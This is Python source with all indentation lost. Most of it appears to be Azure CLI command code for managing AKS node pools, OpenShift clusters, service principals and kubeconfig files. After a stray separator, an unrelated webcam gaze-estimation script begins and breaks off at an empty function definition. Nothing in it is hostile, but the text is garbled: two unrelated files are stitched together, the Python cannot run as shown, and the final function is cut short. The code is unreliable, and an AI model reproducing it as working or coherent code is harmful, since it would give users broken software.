def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
no_wait=False):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cmd,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cmd, cluster_identity_object_id, scope):
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cmd, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
|
data_creation_game2.py
|
#!/usr/bin/env python3
"""Main script for gaze direction inference from webcam feed."""
import argparse
import os
import queue
import threading
import time
import coloredlogs
import cv2 as cv
import numpy as np
import tensorflow as tf
import tensorflow.compat.v1 as tf
import pyautogui
import random
tf.disable_v2_behavior()
from datasources import Video, Webcam
from models import ELG
import util.gaze
def get_face_orient(image, landmarks):
if not len(landmarks):
return {}
size = image.shape
image_points = landmarks[0]
# 3D model points.
model_points = np.array([
(0.0, 0.0, 0.0), # Nose tip
(0.0, -330.0, -65.0), # Chin
(-225.0, 170.0, -135.0), # Left eye left corner
(225.0, 170.0, -135.0), # Right eye right corne
(-150.0, -150.0, -125.0), # Left Mouth corner
(150.0, -150.0, -125.0) # Right mouth corner
])
# Camera internals
focal_length = size[1]
center = (size[1]/2, size[0]/2)
camera_matrix = np.array(
[[focal_length, 0, center[0]],
[0, focal_length, center[1]],
[0, 0, 1]], dtype = "double"
)
#print ("Camera Matrix :\n {0}".format(camera_matrix))
dist_coeffs = np.zeros((4,1)) # Assuming no lens distortion
(success, rotation_vector, translation_vector) = cv.solvePnP(model_points, image_points, camera_matrix, dist_coeffs)
#print ("Rotation Vector:\n {0}".format(rotation_vector))
#print ("Translation Vector:\n {0}".format(translation_vector))
# Project a 3D point (0, 0, 1000.0) onto the image plane.
# We use this to draw a line sticking out of the nose
(nose_end_point2D, jacobian) = cv.projectPoints(np.array([(0.0, 0.0, 1000.0)]), rotation_vector, translation_vector, camera_matrix, dist_coeffs)
# for p in image_points:
# cv.circle(image, (int(p[0]), int(p[1])), 3, (0,0,255), -1)
p1 = ( int(image_points[0][0]), int(image_points[0][1]))
p2 = ( int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
cv.line(image, p1, p2, (255,0,0), 2)
return {'rotation_vector':rotation_vector, 'translation_vector':translation_vector}
def game_init():
